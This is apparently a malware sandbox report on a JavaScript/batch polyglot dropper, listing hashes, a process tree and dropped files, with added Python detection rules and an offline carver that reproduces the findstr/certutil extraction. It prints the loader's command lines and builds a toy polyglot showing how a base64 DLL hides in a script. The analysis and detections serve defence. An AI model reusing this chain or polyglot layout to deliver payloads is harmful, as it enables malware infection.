Resubmissions

Submitted           Analysis ID          Score
19-02-2024 19:16    240219-xzannsbc6y    10
19-02-2024 19:12    240219-xwla1abb8z    1
06-02-2024 16:53    240206-veee1sbeb4    10

Analysis
Max time kernel: 92s
Max time network: 134s
Platform: windows10-2004_x64
Resource: win10v2004-20231215-en
Resource tags: arch:x64, arch:x86, image:win10v2004-20231215-en, locale:en-us, os:windows10-2004-x64, system
Submitted: 19-02-2024 19:16
Static task
static1

General

Target: 1727822909290912689.js
Size: 647KB
MD5: 9d68a860c54584dd2d52f465160ee6ad
SHA1: 42270d711512467421fd9f15530a70476f383172
SHA256: cf66b2a95512490b690794f70d6c847aa8047bee3975c1eb46a7a892f74b9cff
SHA512: 352838f21a3664f308327c3e9e7f318d3af3480f0fcf952c2ae9cbd647826baf29274db0545822ff13365271ae2638f3a7b662caf40744b14cf6502abbad0539
SSDEEP: 6144:GYkeuxJrlxHlmMkIKjT5/gId68KpldKlZk7bm0KGm63EYnkkenxf2SeefVZwzqzs:GY7orJGIS/gIl3NGN0YnkR+tfVWE
Malware Config
Signatures
Checks computer location settings (2 TTPs, 1 IoC)
Looks up the country code configured in the registry, likely a geofence check.
  Process: wscript.exe
  Key value queried: \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000\Control Panel\International\Geo\Nation

Loads dropped DLL (1 IoC)
  Process: rundll32.exe (PID 4148)

Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s).

Suspicious use of WriteProcessMemory (10 IoCs)
Each parent-to-child write below was recorded twice, giving the ten IoCs.
  Source PID   Source process   Target PID   Target process
  4208         wscript.exe      1620         cmd.exe
  1620         cmd.exe          1916         findstr.exe
  1620         cmd.exe          2656         certutil.exe
  1620         cmd.exe          1708         cmd.exe
  1708         cmd.exe          4148         rundll32.exe
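The parent-to-child pairs above, together with the command lines in the process tree, are enough to write process-creation detections for this chain without any file or network indicator. The following is an added example, not part of the sandbox report: it runs four rules over constructed Sysmon-style events transcribed from this report's PIDs and command lines. The parent PIDs of the root process and the two benign control rows (PIDs 5000 and 5001) are assumptions, and the KNOWN_SYSTEM_DLLS allowlist is a placeholder to be replaced by your own baseline.

```python
"""Process-creation detections for the wscript -> cmd -> findstr/certutil -> rundll32 chain.
Events are CONSTRUCTED from the report's process tree; they are not real telemetry."""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str
    cmdline: str


SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe"}
CERT_EXTS = (".cer", ".crt", ".pem", ".der", ".p7b", ".pfx")
# Bare DLL names rundll32 legitimately resolves from System32 (placeholder allowlist).
KNOWN_SYSTEM_DLLS = {"shell32.dll", "user32.dll", "setupapi.dll", "printui.dll"}

EVENTS = [
    # PIDs, images and command lines transcribed from the report; ppid of the root is assumed.
    ProcEvent(4208, 1, r"C:\Windows\system32\wscript.exe",
              r"wscript.exe C:\Users\Admin\AppData\Local\Temp\1727822909290912689.js"),
    ProcEvent(1620, 4208, r"C:\Windows\System32\cmd.exe",
              r'"C:\Windows\System32\cmd.exe" /k copy "C:\Users\Admin\AppData\Local\Temp\1727822909290912689.js" '
              r'"C:\Users\Admin\\yelltame.bat" && "C:\Users\Admin\\yelltame.bat"'),
    ProcEvent(1916, 1620, r"C:\Windows\system32\findstr.exe",
              r'findstr /V complexsugar ""C:\Users\Admin\\yelltame.bat""'),
    ProcEvent(2656, 1620, r"C:\Windows\system32\certutil.exe",
              r"certutil -f -decode cherryargument high-pitchedhandsomely.dll"),
    ProcEvent(1708, 1620, r"C:\Windows\system32\cmd.exe",
              r"cmd /C rundll32 high-pitchedhandsomely.dll,main"),
    ProcEvent(4148, 1708, r"C:\Windows\system32\rundll32.exe",
              r"rundll32 high-pitchedhandsomely.dll,main"),
    # Constructed benign control rows: neither should fire.
    ProcEvent(5000, 1, r"C:\Windows\system32\certutil.exe", r"certutil -verify cert.cer"),
    ProcEvent(5001, 1, r"C:\Windows\system32\rundll32.exe", r"rundll32.exe shell32.dll,Control_RunDLL"),
]


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def detect(events: list[ProcEvent]) -> list[tuple[str, int]]:
    """Return sorted (rule, pid) hits for the four behaviours the report's tree exhibits."""
    by_pid = {e.pid: e for e in events}
    hits: list[tuple[str, int]] = []
    for ev in events:
        img = basename(ev.image)
        cl = ev.cmdline.lower()
        tokens = cl.split()
        parent = by_pid.get(ev.ppid)

        # 1. A script host spawning a shell (wscript.exe 4208 -> cmd.exe 1620).
        if img == "cmd.exe" and parent is not None and basename(parent.image) in SCRIPT_HOSTS:
            hits.append(("script_host_spawns_cmd", ev.pid))

        # 2. cmd copying a .js to a .bat: the rename that lets the same bytes run as batch.
        if img == "cmd.exe" and re.search(r'\bcopy\s+("[^"]+\.js"|\S+\.js)\s+("[^"]+\.bat"|\S+\.bat)', cl):
            hits.append(("cmd_copies_js_to_bat", ev.pid))

        # 3. certutil -decode whose output is not a certificate (here a .dll).
        if img == "certutil.exe" and any(t in ("-decode", "-decodehex") for t in tokens):
            if not tokens[-1].endswith(CERT_EXTS):
                hits.append(("certutil_decode_to_non_cert", ev.pid))

        # 4. rundll32 loading a DLL from a user-writable path, or a bare name that is not a
        #    known System32 DLL. A bare name missing from the system directories falls
        #    through to the working directory, which here was C:\Users\Admin.
        if img == "rundll32.exe":
            parts = ev.cmdline.split(maxsplit=1)
            if len(parts) == 2:
                dll = parts[1].split(",")[0].strip('"').lower()
                user_path = "\\users\\" in dll or "\\temp\\" in dll
                bare_unknown = "\\" not in dll and dll not in KNOWN_SYSTEM_DLLS
                if user_path or bare_unknown:
                    hits.append(("rundll32_unqualified_or_user_dll", ev.pid))
    return sorted(hits)


if __name__ == "__main__":
    for rule, pid in detect(EVENTS):
        print(f"{rule:36s} pid={pid}")
```

Rule 4 is the noisiest in a real estate; pairing it with an image-load event for a DLL under a user profile (the report's "Loads dropped DLL" signature) removes most of the false positives that a bare-name allowlist alone cannot.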
Processes

1. C:\Windows\system32\wscript.exe (PID 4208)
   wscript.exe C:\Users\Admin\AppData\Local\Temp\1727822909290912689.js
   - Checks computer location settings
   - Suspicious use of WriteProcessMemory

   2. C:\Windows\System32\cmd.exe (PID 1620)
      "C:\Windows\System32\cmd.exe" /k copy "C:\Users\Admin\AppData\Local\Temp\1727822909290912689.js" "C:\Users\Admin\\yelltame.bat" && "C:\Users\Admin\\yelltame.bat"
      - Suspicious use of WriteProcessMemory

      3. C:\Windows\system32\findstr.exe (PID 1916)
         findstr /V complexsugar ""C:\Users\Admin\\yelltame.bat""

      3. C:\Windows\system32\certutil.exe (PID 2656)
         certutil -f -decode cherryargument high-pitchedhandsomely.dll

      3. C:\Windows\system32\cmd.exe (PID 1708)
         cmd /C rundll32 high-pitchedhandsomely.dll,main
         - Suspicious use of WriteProcessMemory

         4. C:\Windows\system32\rundll32.exe (PID 4148)
            rundll32 high-pitchedhandsomely.dll,main
            - Loads dropped DLL

The tree shows a JS/BAT polyglot: the .js is copied byte-for-byte to yelltame.bat (identical hashes under Downloads) and executed as a batch file. findstr /V drops every line containing the marker "complexsugar", and since the command line shows no redirection, cmd.exe must have redirected its output to the 306KB file cherryargument, which certutil then base64-decodes into the 229KB high-pitchedhandsomely.dll that rundll32 loads through its "main" export. The sizes are consistent with that reading: 229KB of binary base64-encodes to roughly 305KB, so cherryargument is the encoded DLL and the remaining bytes of the 647KB script are the marker-carrying JS/batch lines that findstr stripped. All three LOLBins are run from C:\Users\Admin, the working directory in which the files were dropped.
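Because the extraction stage is just findstr /V followed by certutil -decode, an analyst can recover the embedded DLL from the .js without executing it and compare the result against the dropped-file hashes listed under Downloads. The code below is an added example, not part of the report: it re-implements the two LOLBin steps in Python and runs them over a constructed toy polyglot whose "payload" is a fake MZ header plus filler, built in the layout the process tree implies. The marker word and the three command lines are taken from the report; everything else in the toy is an assumption.

```python
"""Offline reproduction of the dropper's extraction stage: findstr /V + certutil -decode.
The polyglot and payload below are CONSTRUCTED for illustration, not the real sample."""
import base64
import hashlib
import re

MARKER = "complexsugar"  # filter word from the report's `findstr /V complexsugar` command

# Stand-in for the embedded DLL: MZ signature plus filler bytes (not a real PE).
TOY_PAYLOAD = b"MZ\x90\x00" + bytes(range(60))


def findstr_v(text: str, marker: str) -> list[str]:
    """Emulate `findstr /V <marker> <file>`: keep only lines that do NOT contain the marker.
    findstr is case-sensitive by default and treats the pattern as a regex, but a plain
    word with no metacharacters behaves as a substring match."""
    return [line for line in text.splitlines() if marker not in line]


def certutil_decode(lines: list[str]) -> bytes:
    """Emulate `certutil -decode <in> <out>`: drop PEM armour and blank lines, join, and
    base64-decode. validate=True makes a wrong marker fail loudly (binascii.Error) instead
    of silently producing garbage, which is what certutil would do with bad input."""
    armour = re.compile(r"^-----(BEGIN|END) CERTIFICATE-----$")
    body = "".join(l.strip() for l in lines if l.strip() and not armour.match(l.strip()))
    return base64.b64decode(body, validate=True)


def build_toy_polyglot(payload: bytes) -> str:
    """Constructed JS/BAT polyglot in the style the process tree implies (an assumption about
    layout, not the sample's actual bytes). Every script line carries the marker so findstr /V
    removes it; only certutil's PEM armour and the base64 body survive the filter."""
    b64 = base64.b64encode(payload).decode("ascii")
    body = [b64[i:i + 64] for i in range(0, len(b64), 64)]  # certutil -encode wraps at 64
    return "\r\n".join([
        "/* complexsugar 2>nul",  # JS: comment opens; BAT: bogus command, error hidden
        'findstr /V complexsugar "%~f0" > cherryargument',
        "certutil -f -decode cherryargument high-pitchedhandsomely.dll & rem complexsugar",
        "cmd /C rundll32 high-pitchedhandsomely.dll,main & rem complexsugar",
        "exit /b & rem complexsugar",
        "complexsugar */",
        "/* complexsugar",
        "-----BEGIN CERTIFICATE-----",
        *body,
        "-----END CERTIFICATE-----",
        "complexsugar */",
    ])


def carve(polyglot: str, marker: str = MARKER) -> dict:
    """Recover the embedded file exactly as the dropper would, without running it, and return
    the values an analyst compares against the sandbox's dropped-file entry."""
    payload = certutil_decode(findstr_v(polyglot, marker))
    return {
        "payload": payload,
        "size": len(payload),
        "sha256": hashlib.sha256(payload).hexdigest(),
        "is_pe": payload[:2] == b"MZ",  # a real dropped DLL must start with the MZ signature
    }


if __name__ == "__main__":
    result = carve(build_toy_polyglot(TOY_PAYLOAD))
    print(f"size={result['size']} is_pe={result['is_pe']} sha256={result['sha256']}")
```

Against the real sample, carve() on the .js contents should yield 229KB with the SHA256 listed for high-pitchedhandsomely.dll; a mismatch means the marker or the decode step differs from what the command lines suggest.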
Network
MITRE ATT&CK Matrix ATT&CK v13
Downloads

C:\Users\Admin\cherryargument
  Filesize: 306KB
  MD5: e0ab76e2f14e9a8d3314f0d88924c318
  SHA1: debed77dc28f418fa1d4d3c76d11f543cd75ce73
  SHA256: ea11fda572f1131a0e002d3475324411aee6c8760ac69e7118f13170521913ca
  SHA512: e978e6f237aff763f8a87f6fc81c6f82bd98afdf210c3f4d2fa88df06ac0d2d421cbbc845d40ff2441a725d0392ecc8e0d0daeac48d49cad6d3cf5a1c08d91ac

C:\Users\Admin\high-pitchedhandsomely.dll
  Filesize: 229KB
  MD5: 7510774ef92e9c6a391b92a0bd3f408b
  SHA1: 741652f31e83c6ed6908ed4e0cfc46f79451d985
  SHA256: 4254817a71122bb75a09cfa918c3a5c8fac4b44c2073cb5f62f25931531c739c
  SHA512: a5a6a058975bdef39be187104895be1656ee8547abd9cdbe0713cf4f7a7f92e5f5c901edf7ba4dd18bd6a9e65631e64f73a681ab3563f8eed00381c257b32264

C:\Users\Admin\yelltame.bat (identical to the submitted .js)
  Filesize: 647KB
  MD5: 9d68a860c54584dd2d52f465160ee6ad
  SHA1: 42270d711512467421fd9f15530a70476f383172
  SHA256: cf66b2a95512490b690794f70d6c847aa8047bee3975c1eb46a7a892f74b9cff
  SHA512: 352838f21a3664f308327c3e9e7f318d3af3480f0fcf952c2ae9cbd647826baf29274db0545822ff13365271ae2638f3a7b662caf40744b14cf6502abbad0539

memory/4148-198-0x00007FFF627B0000-0x00007FFF627F1000-memory.dmp
  Filesize: 260KB

memory/4148-199-0x0000018CE0550000-0x0000018CE0573000-memory.dmp
  Filesize: 140KB